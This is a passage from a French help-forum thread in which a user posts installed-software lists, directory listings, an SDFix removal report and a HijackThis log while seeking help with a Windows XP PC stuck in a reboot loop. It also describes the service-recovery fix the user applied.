(KB893756) Mise à jour de sécurité pour Windows XP (KB893756) Mise à jour de sécurité pour Windows XP (KB896358) Mise à jour de sécurité pour Windows XP (KB896358) Mise à jour de sécurité pour Windows XP (KB896422) Mise à jour de sécurité pour Windows XP (KB896422) Mise à jour de sécurité pour Windows XP (KB896423) Mise à jour de sécurité pour Windows XP (KB896423) Mise à jour de sécurité pour Windows XP (KB896424) Mise à jour de sécurité pour Windows XP (KB896424) Mise à jour de sécurité pour Windows XP (KB896428) Mise à jour de sécurité pour Windows XP (KB896428) Mise à jour de sécurité pour Windows XP (KB896688) Mise à jour de sécurité pour Windows XP (KB896688) Mise à jour de sécurité pour Windows XP (KB899587) Mise à jour de sécurité pour Windows XP (KB899587) Mise à jour de sécurité pour Windows XP (KB899588) Mise à jour de sécurité pour Windows XP (KB899588) Mise à jour de sécurité pour Windows XP (KB899591) Mise à jour de sécurité pour Windows XP (KB899591) Mise à jour de sécurité pour Windows XP (KB900725) Mise à jour de sécurité pour Windows XP (KB900725) Mise à jour de sécurité pour Windows XP (KB901214) Mise à jour de sécurité pour Windows XP (KB901214) Mise à jour de sécurité pour Windows XP (KB903235) Mise à jour de sécurité pour Windows XP (KB903235) Mise à jour de sécurité pour Windows XP (KB904706) Mise à jour de sécurité pour Windows XP (KB904706) Mise à jour de sécurité pour Windows XP (KB905414) Mise à jour de sécurité pour Windows XP (KB905414) Mise à jour de sécurité pour Windows XP (KB905749) Mise à jour de sécurité pour Windows XP (KB905749) Mise à jour de sécurité pour Windows XP (KB905915) Mise à jour de sécurité pour Windows XP (KB905915) Mise à jour de sécurité pour Windows XP (KB908519) Mise à jour de sécurité pour Windows XP (KB908519) Mise à jour de sécurité pour Windows XP (KB908531) Mise à jour de sécurité pour Windows XP (KB908531) Mise à jour de sécurité pour Windows XP (KB911280) Mise à jour de sécurité pour Windows XP (KB911280) Mise à jour de sécurité pour Windows XP (KB911562) Mise à jour de sécurité pour Windows XP (KB911562) Mise à jour de sécurité pour Windows XP (KB911567) Mise à jour de sécurité pour Windows XP (KB911567) Mise à jour de sécurité pour Windows XP (KB911927) Mise à jour de sécurité pour Windows XP (KB911927) Mise à jour de sécurité pour Windows XP (KB912812) Mise à jour de sécurité pour Windows XP (KB912812) Mise à jour de sécurité pour Windows XP (KB912919) Mise à jour de sécurité pour Windows XP (KB912919) Mise à jour de sécurité pour Windows XP (KB913446) Mise à jour de sécurité pour Windows XP (KB913446) Mise à jour de sécurité pour Windows XP (KB913580) Mise à jour de sécurité pour Windows XP (KB913580) Mise à jour de sécurité pour Windows XP (KB914388) Mise à jour de sécurité pour Windows XP (KB914388) Mise à jour de sécurité pour Windows XP (KB914389) Mise à jour de sécurité pour Windows XP (KB914389) Mise à jour de sécurité pour Windows XP (KB916281) Mise à jour de sécurité pour Windows XP (KB916281) Mise à jour de sécurité pour Windows XP (KB917159) Mise à jour de sécurité pour Windows XP (KB917159) Mise à jour de sécurité pour Windows XP (KB917344) Mise à jour de sécurité pour Windows XP (KB917344) Mise à jour de sécurité pour Windows XP (KB917422) Mise à jour de sécurité pour Windows XP (KB917422) Mise à jour de sécurité pour Windows XP (KB917953) Mise à jour de sécurité pour Windows XP (KB917953) Mise à jour de sécurité pour Windows XP (KB918118) Mise à jour de sécurité pour Windows XP (KB918118) Mise à jour de sécurité pour Windows XP (KB918439) Mise à jour de sécurité pour Windows XP (KB918439) Mise à jour de sécurité pour Windows XP (KB918899) Mise à jour de sécurité pour Windows XP (KB918899) Mise à jour de sécurité pour Windows XP (KB919007) Mise à jour de sécurité pour Windows XP (KB920213) Mise à jour de sécurité pour Windows XP (KB920214) Mise à jour de sécurité pour Windows XP (KB920670) Mise à jour de sécurité pour Windows XP (KB920683) Mise à jour de sécurité pour Windows XP (KB920685) Mise à jour de sécurité pour Windows XP (KB921398) Mise à jour de sécurité pour Windows XP (KB921883) Mise à jour de sécurité pour Windows XP (KB922616) Mise à jour de sécurité pour Windows XP (KB922760) Mise à jour de sécurité pour Windows XP (KB922819) Mise à jour de sécurité pour Windows XP (KB923191) Mise à jour de sécurité pour Windows XP (KB923414) Mise à jour de sécurité pour Windows XP (KB923689) Mise à jour de sécurité pour Windows XP (KB923694) Mise à jour de sécurité pour Windows XP (KB923980) Mise à jour de sécurité pour Windows XP (KB924191) Mise à jour de sécurité pour Windows XP (KB924270) Mise à jour de sécurité pour Windows XP (KB924496) Mise à jour de sécurité pour Windows XP (KB924667) Mise à jour de sécurité pour Windows XP (KB925486) Mise à jour de sécurité pour Windows XP (KB925902) Mise à jour de sécurité pour Windows XP (KB926255) Mise à jour de sécurité pour Windows XP (KB926436) Mise à jour de sécurité pour Windows XP (KB927779) Mise à jour de sécurité pour Windows XP (KB927802) Mise à jour de sécurité pour Windows XP (KB928255) Mise à jour de sécurité pour Windows XP (KB928843) Mise à jour de sécurité pour Windows XP (KB930178) Mise à jour de sécurité pour Windows XP (KB931261) Mise à jour de sécurité pour Windows XP (KB931784) Mise à jour de sécurité pour Windows XP (KB932168) Mise à jour pour Windows XP (KB894391) Mise à jour pour Windows XP (KB894391) Mise à jour pour Windows XP (KB896727) Mise à jour pour Windows XP (KB896727) Mise à jour pour Windows XP (KB898461) Mise à jour pour Windows XP (KB898461) Mise à jour pour Windows XP (KB900485) Mise à jour pour Windows XP (KB900485) Mise à jour pour Windows XP (KB904942) Mise à jour pour Windows XP (KB904942) Mise à jour pour Windows XP (KB910437) Mise à jour pour Windows XP (KB910437) Mise à jour pour Windows XP (KB916595) Mise à jour pour Windows XP (KB916595) Mise à jour pour Windows XP (KB920872) Mise à jour pour Windows XP (KB922582) Mise à jour pour Windows XP (KB929338) Mise à jour pour Windows XP (KB930916) Mise à jour pour Windows XP (KB931836) MSN Messenger 7.5 MSXML 4.0 SP2 (KB927978) navigating.de POI-Warner MN5 Edition Nero OEM NVIDIA Drivers OS Pack Works Suite PCI Audio Applications PCI Audio Driver PhotoFiltre Programme de gestion Camera de Logitech® QuickTime RealPlayer SAGEM F@st 800-840 Sagem Wi-Fi 11g USB adapter Shockwave SLD Codec Pack SuDoku Quest Synchronisation de Works VideoLAN VLC media player 0.8.5 WebFldrs XP Windows Genuine Advantage Notifications (KB905474) Windows Installer 3.1 (KB893803) Windows Installer 3.1 (KB893803) Windows Installer 3.1 (KB893803) Windows Installer 3.1 (KB893803) Windows Installer Clean Up Windows Internet Explorer 7 Windows Internet Explorer 7 Windows Media Format 11 runtime Windows Media Format 11 runtime Windows Media Player 11 Windows XP Service Pack 2 XviD MPEG-4 Video Codec Yazzle by OIN Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\Program Files 12/05/2007 12:33 <REP> . 12/05/2007 12:33 <REP> .. 23/06/2006 15:39 <REP> Adobe 13/03/2005 10:53 <REP> Ahead 08/03/2007 13:43 <REP> AOL 27/02/2007 20:24 <REP> Assistant Dartybox 27/06/2005 20:31 <REP> AvantGo Connect 26/09/2006 11:03 <REP> Capturino 18/03/2007 12:03 <REP> CCleaner 10/04/2005 17:28 <REP> C-Media 27/06/2005 20:31 <REP> Common Files 10/02/2005 20:25 <REP> ComPlus Applications 10/05/2007 15:54 <REP> eMule 15/01/2007 17:58 <REP> epson 04/12/2005 15:46 <REP> Fax Machine 30/08/2005 19:41 <REP> fdjeux 31/03/2007 21:12 <REP> Fichiers communs 24/04/2007 10:38 <REP> FMS 10/05/2007 18:37 <REP> Grisoft 10/05/2006 16:27 <REP> HardwareDetection 13/05/2007 16:48 <REP> Hijackthis Version Française 09/05/2007 22:02 <REP> Internet Explorer 15/01/2007 17:56 <REP> InterVideo 23/02/2007 11:59 <REP> Java 18/12/2006 20:51 <REP> Lavasoft 31/03/2007 21:12 <REP> Logitech 28/03/2006 13:17 <REP> Matroska Pack 14/12/2006 17:56 <REP> MediaInfo 04/03/2005 19:37 <REP> Messenger 20/03/2007 17:59 <REP> MessengerSkinner 06/03/2007 18:10 <REP> Microsoft ActiveSync 18/02/2005 18:56 <REP> Microsoft Encarta 10/02/2005 20:29 <REP> microsoft frontpage 04/02/2006 20:06 <REP> Microsoft Office 18/02/2005 18:51 <REP> Microsoft Works 18/02/2005 18:44 <REP> Microsoft Works Suite 2001 17/04/2005 22:21 <REP> Microsoft.NET 04/03/2005 18:40 <REP> Movie Maker 03/10/2006 10:47 <REP> MSECACHE 10/02/2005 20:24 <REP> MSN 05/06/2006 16:43 <REP> MSN Games 10/02/2005 20:23 <REP> MSN Gaming Zone 10/09/2006 14:46 <REP> MSN Messenger 16/11/2006 14:20 <REP> MSXML 4.0 26/07/2006 17:25 <REP> NetMeeting 14/12/2006 23:12 <REP> Outlook Express 10/05/2006 10:38 <REP> PCI Audio Applications 15/04/2007 18:15 <REP> PhotoFiltre 27/03/2007 16:47 <REP> POI-Warner MN5 Edition 14/02/2005 09:53 <REP> QuickTime 24/10/2005 12:42 <REP> Real 15/01/2007 17:59 <REP> Resco 08/02/2007 16:53 <REP> SAGEM 08/02/2007 17:09 <REP> SAGEM WiFi manager 10/02/2005 20:26 <REP> Services en ligne 07/03/2005 18:41 <REP> Siber Systems 11/08/2006 14:57 <REP> SLD Codec Pack 21/11/2006 14:53 <REP> VideoLAN 03/10/2006 10:48 <REP> Windows Installer Clean Up 27/10/2006 12:26 <REP> Windows Media Components 15/12/2006 14:35 <REP> Windows Media Connect 2 15/12/2006 14:35 <REP> Windows Media Player 04/03/2005 18:36 <REP> Windows NT 06/03/2005 12:02 <REP> WinRAR 10/02/2005 20:29 <REP> xerox 11/08/2006 14:52 <REP> XviD 0 fichier(s) 0 octets 66 Rép(s) 3 503 730 688 octets libres Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\Program Files\fichiers communs 31/03/2007 21:12 <REP> . 31/03/2007 21:12 <REP> .. 06/02/2007 11:17 <REP> Adobe 13/03/2005 10:53 <REP> Ahead 17/04/2005 22:20 <REP> DESIGNER 31/03/2007 21:12 <REP> FotoWire 14/04/2005 18:37 <REP> Hewlett-Packard 24/12/2005 15:15 <REP> InstallShield 20/05/2006 15:34 <REP> Java 04/04/2005 17:02 <REP> Logitech 06/03/2007 18:10 <REP> Microsoft Shared 10/02/2005 20:25 <REP> MSSoap 10/02/2005 20:16 <REP> ODBC 24/10/2005 12:43 <REP> Real 10/02/2005 20:25 <REP> Services 10/02/2005 20:16 <REP> SpeechEngines 08/03/2007 12:28 <REP> Symantec Shared 14/12/2006 23:12 <REP> System 24/10/2005 12:43 <REP> xing shared 0 fichier(s) 0 octets 19 Rép(s) 3 503 730 688 octets libres Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\Program Files\fichiers communs\Microsoft Shared\Web Folders 17/04/2005 22:20 <REP> . 17/04/2005 22:20 <REP> .. 17/04/2005 22:20 <REP> 1033 17/04/2005 22:20 <REP> 1036 11/07/2003 10:15 1 292 872 MSONSEXT.DLL 15/07/2003 06:52 35 896 MSOSV.DLL 03/06/1999 15:09 122 937 MSOWS409.DLL 07/03/2001 10:00 127 033 MSOWS40c.DLL 11/07/2003 02:25 80 448 PKMWS.DLL 5 fichier(s) 1 659 186 octets 4 Rép(s) 3 503 726 592 octets libres Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\Program Files\common files 27/06/2005 20:31 <REP> . 27/06/2005 20:31 <REP> .. 27/06/2005 20:31 <REP> Microsoft Shared 0 fichier(s) 0 octets 3 Rép(s) 3 503 726 592 octets libres Le volume dans le lecteur C n'a pas de nom. Le numéro de série du volume est D0EA-F27E Répertoire de C:\ 08/05/2007 11:48 68 096 diff.exe 08/05/2007 11:48 103 424 grep.exe 2 fichier(s) 171 520 octets 0 Rép(s) 3 503 726 592 octets libres c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\Setup.exe c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\Crack No Cd\Dora_Sakado.exe c:\Documents and Settings\Emilie\Local Settings\Temp\Rar$EX01.133\DirectX\dxsetup.exe c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWin4.12.3.exe c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWinInstaller 1.exe c:\Documents and Settings\Françoise\.limewire\.NetworkShare\LimeWireWinInstaller.exe c:\Documents and Settings\Françoise\Local Settings\Temp\jrestub.exe c:\Documents and Settings\Françoise\Local Settings\Temporary Internet Files\Content.IE5\63IIDUPE\2785.Cdiscount_Alert[1].exe c:\Documents and Settings\Françoise\Mes documents\Telechargement\LimeWireWin.exe c:\Documents and Settings\Pascal\Application Data\Adobe\Acrobat\7.0\Updater\AdbeRdr709_en_US.exe c:\Documents and Settings\Pascal\Application Data\LimeWire\.NetworkShare\LimeWireWin4.12.6-fixed.exe c:\Documents and Settings\Pascal\Application Data\LimeWire\.NetworkShare\LimeWireWin4.12.6-nopack2.exe c:\Documents and Settings\Pascal\Application Data\Microsoft\Installer\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}\Icon386ED4E3.exe c:\Documents and Settings\Pascal\Bureau\SDFix.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\catchme.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\diff.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\dumphive.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\FilesInfoCmd.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\find2.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\Fport.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\grep.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\LFiles.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\LISTDLLS.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\pslist.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\streams.exe c:\Documents and Settings\Pascal\Bureau\DiagHelp\swreg.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\Catchme.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\cliptext.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\download.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\LS.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\MD5File.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\MoveEx.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Process.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\RegDACL.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\RestartIt!.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\sc.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\SF.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\shutdown.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\swreg.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\swsc.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\unzip.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\zip.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Replace\W2K.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\apps\Replace\XP.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\attrib.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\find.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\findstr.exe c:\Documents and Settings\Pascal\Bureau\Sdfix\SDFix\backups\regedit.exe c:\Documents and Settings\Pascal\Menu Démarrer\Programmes\Accessoires\sudoku.exe c:\Documents and Settings\Pascal\Mes documents\MSASYNC.EXE c:\Documents and Settings\Pascal\Mes documents\Lavasoft\aawsepersonal.exe c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pllangs.exe c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pllspexplorer.exe c:\Documents and Settings\Pascal\Mes documents\Lavasoft\ploemessenger.exe c:\Documents and Settings\Pascal\Mes documents\Lavasoft\pltweakse.exe c:\Documents and Settings\Pascal\Mes documents\Lavasoft\vx2cleaner_inst.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\CALCCE.EXE c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\capturino.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\ccsetup137.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\eMule0.47c-Installer.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\eMulePlus-1n.Installer.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\HIJACKTHIS VF.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\izispot.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\MediaInfo_0.7.3.1_GUI_Win32.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\msicuu2.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\msjavwu_w.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\pf-setup.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\spybotsd14.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\Windows_Media_Encoder_9.0.exe c:\Documents and Settings\Pascal\Mes documents\Mes fichiers reçus\xnview-pocket_xnview_pocket_1.31_arm_xscale_francais_13325.exe c:\Documents and Settings\Pascal\Mes documents\My Music\Website Download (AudioRack WDM, VxD) 1.4.part1.exe c:\Documents and Settings\Pascal\Mes documents\WindowsCE My Documents\RegEdit.exe c:\Documents and Settings\Pascal\Mes documents\WindowsCE My Documents\showtaskbar.exe c:\Documents and Settings\Pascal\Mes documents\Winrar\wrar330fr.exe c:\Documents and Settings\All Users\Application Data\AOL\AVP6\Bases\avcmhk4.dll c:\Documents and Settings\All Users\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll c:\Documents and Settings\All Users\Application Data\Microsoft\USMT\iconlib.dll c:\Documents and Settings\Françoise\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll c:\Documents and Settings\LocalService\Application Data\Microsoft\UPnP Device Host\upnphost\udhisapi.dll c:\Documents and Settings\Pascal\Application Data\Microsoft\IdentityCRL\ppcrlconfig.dll Je me répète mais encore merci pour ton aide.

Youpi youpi yeah !!!!!!!!! Je suis parvenu a stoppé le redémarrage de la bête !!!!!!! En utilisant cette procédure trouvée sur le site de microsft : En premier lieu, pour empêcher tout redémarrage intempestif de votre ordinateur, après votre identification (compte utilisateur et mot de passe) : * Cliquez sur Démarrer, puis sur Exécuter. La boîte de dialogue Exécuter apparaît. * Saisissez SERVICES.MSC dans la ligne Ouvrir et cliquez sur OK. La fenêtre Services s'ouvre alors. * Dans la liste des services, sélectionnez Appel de procédure distante (RPC). * Double-cliquez alors sur Appel de procédure distante (RPC). * Cliquez ensuite sur l'onglet Récupération. * Pour les options Première défaillance, Deuxième défaillance et Défaillances suivantes, choisissez Redémarrer le service. * Cliquez enfin sur Appliquer, puis sur OK. Du coup je vais pouvoir lancer un scan avec Diaghelp... mais pas ce soir parce que là je vais bosser. A demain pour la suite

Bonjour Malekal morte, Tout d'abord, je te remercie de ta perséverance et de ton aide. Pour ce qui est de la livebox et ben c'est non!!! En fait je suis chez Darty, donc Dartybox qui est un model sagem Et pour ce qui est du scan avec Diaghelp, tu me l'avais déjà demandé (voir post plus haut) mais malheureusement mon problème de redémarrage fait que je ne peux pas aller au bout du scan.... Voilà donc où j'en suis rendu ce matin

On en revient toujours au même problème... Je n'ai pas le temps de ré-installer le wifi. Ce qui est bizarre, c'est que l'ordinateur accroche bien mon réseau mais ne fais pas la connexion en automatique. Il de demande de saisir la clef wep. Et là j'ai jamais le temps... Le soucis majeur c'est qu'outre le fait que le micro redémarre au bout de trois ou quatre minutes, lorsque j'ouvre ma session le bureau disparait et réapparait toutes les minutes (à peu près) et, de fait, interrompt toute activité. Ce qui laisse très peu de temps à chaque fois pour faire quelque chose... Y'a qu'en mode sans échec où je n'ai pas de problème d'interruption...

Voici le rapport SDFix : SDFix: Version 1.83 Run by Pascal - 13/05/2007 - 16:31:12,10 Microsoft Windows XP [version 5.1.2600] Running From: C:\DOCUME~1\Pascal\Bureau\Sdfix\SDFix Safe Mode: Checking Services: Restoring Windows Registry Values Restoring Windows Default Hosts File Restoring Missing Security Center Service Restoring Missing SharedAccess Service Rebooting... Normal Mode: Checking Files: Below files will be copied to Backups folder then removed: C:\WINDOWS\system32\TFTP1872 - Deleted C:\WINDOWS\system32\win32.bat - Deleted Removing Temp Files ADS Check: Checking if ADS is attached to system32 Folder C:\WINDOWS\system32 No streams found. Checking if ADS is attached to svchost.exe C:\WINDOWS\system32\svchost.exe No streams found. Final Check: Remaining Services: ------------------ Authorized Application Key Export: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019" "C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe"="C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe:*:Enabled:ActiveSync Connection Manager" "C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe:*:Enabled:ActiveSync Application" "C:\\Program Files\\Eicon\\Diva 2400 Series\\Assistant.exe"="C:\\Program Files\\Eicon\\Diva 2400 Series\\Assistant.exe:*:Enabled:Afficheur d'état" "C:\\WINDOWS\\system32\\fxsclnt.exe"="C:\\WINDOWS\\system32\\fxsclnt.exe:*:Enabled:Microsoft Fax Console" "C:\\Program Files\\Internet Explorer\\iexplore.exe"="C:\\Program Files\\Internet Explorer\\iexplore.exe:*:Enabled:Internet Explorer" "C:\\WINDOWS\\PCHEALTH\\HELPCTR\\Binaries\\helpctr.exe"="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\Binaries\\helpctr.exe:*:Enabled:Assistance à distance - Windows Messenger et voix" "C:\\Program Files\\MSN Messenger\\msnmsgr.exe"="C:\\Program Files\\MSN Messenger\\msnmsgr.exe:*:Enabled:MSN Messenger 7.5" "C:\\Program Files\\eMule\\emule.exe"="C:\\Program Files\\eMule\\emule.exe:*:Enabled:eMule" "%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000" "C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayer.exe"="C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayer.exe:*:Enabled:Lecteur CANALPLAY" "C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayerHelper.exe"="C:\\Program Files\\Lecteur CANALPLAY\\CanalPlayerHelper.exe:*:Enabled:Lecteur CANALPLAY Helper" "C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager" "C:\\Program Files\\AOL\\Active Virus Shield\\avp.exe"="C:\\Program Files\\AOL\\Active Virus Shield\\avp.exe:*:Enabled:Active Virus Shield" "C:\\Program Files\\Assistant Dartybox\\upgrade_manager.exe"="C:\\Program Files\\Assistant Dartybox\\upgrade_manager.exe:*:Enabled:Mise à Jour pour L'Assistant Dartybox" "C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LDMConf.exe"="C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\LDMConf.exe:*:Enabled:Desktop Messenger" "C:\\Program Files\\Logitech\\Video\\Launcher.exe"="C:\\Program Files\\Logitech\\Video\\Launcher.exe:*:Enabled:Logitech QuickCam" "C:\\Program Files\\Logitech\\Print Service\\fwPrint.exe"="C:\\Program Files\\Logitech\\Print Service\\fwPrint.exe:*:Enabled:Logitech Print Service" "C:\\WINDOWS\\system32\\dpvsetup.exe"="C:\\WINDOWS\\system32\\dpvsetup.exe:*:Enabled:Microsoft DirectPlay Voice Test" "C:\\WINDOWS\\system32\\rundll32.exe"="C:\\WINDOWS\\system32\\rundll32.exe:*:Enabled:Exécuter une DLL en tant qu'application" "C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019" "C:\\Program Files\\MSN Messenger\\msnmsgr.exe"="C:\\Program Files\\MSN Messenger\\msnmsgr.exe:*:Enabled:MSN Messenger 7.5" "%windir%\\Network Diagnostic\\xpnetdiag.exe"="%windir%\\Network Diagnostic\\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000" "C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager" "C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe"="C:\\Program Files\\Microsoft ActiveSync\\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager" "C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe"="C:\\Program Files\\Microsoft ActiveSync\\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application" Remaining Files: --------------- Backups Folder: - C:\DOCUME~1\Pascal\Bureau\Sdfix\SDFix\backups\backups.zip Checking For Files with Hidden Attributes: C:\WINDOWS\SRUpdate.dll C:\Program Files\Fichiers communs\Yazzle1220OinUninstaller.exe C:\WINDOWS\Navnet.exe C:\WINDOWS\system3285D493723.sys C:\WINDOWS\system32\KGyGaAvL.sys C:\Documents and Settings\All Users\DRM\Cache\Indiv01.tmp C:\Documents and Settings\Pascal\Mes documents\Demainpeutˆtre\~WRL1887.tmp Finished et voici le nouveau rapport Hijackthis : Logfile of HijackThis v1.99.1 Scan saved at 16:49:05, on 13/05/2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16441) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe C:\Program Files\AOL\Active Virus Shield\avp.exe C:\WINDOWS\system32\nvsvc32.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\MsPMSPSv.exe C:\Program Files\QuickTime\qttask.exe C:\WINDOWS\Mixer.exe C:\WINDOWS\system32\LVCOMSX.EXE C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe C:\Program Files\AOL\Active Virus Shield\avp.exe C:\Program Files\Logitech\Video\LogiTray.exe C:\WINDOWS\system32\cmd.exe C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe C:\Program Files\Logitech\Video\FxSvr2.exe C:\WINDOWS\system32\ping.exe C:\WINDOWS\explorer.exe C:\Program Files\Hijackthis Version Française\hijackthis vf.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webmail.dbmail.com/webmail/fr_FR/lo...ml?LOGIN1=panow R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://register.libertysurf.com/dispatch/d...MKTG=PFMPFRPAB7 R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Program Files\Microsoft Works\WkDetect.exe O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [nwiz] nwiz.exe 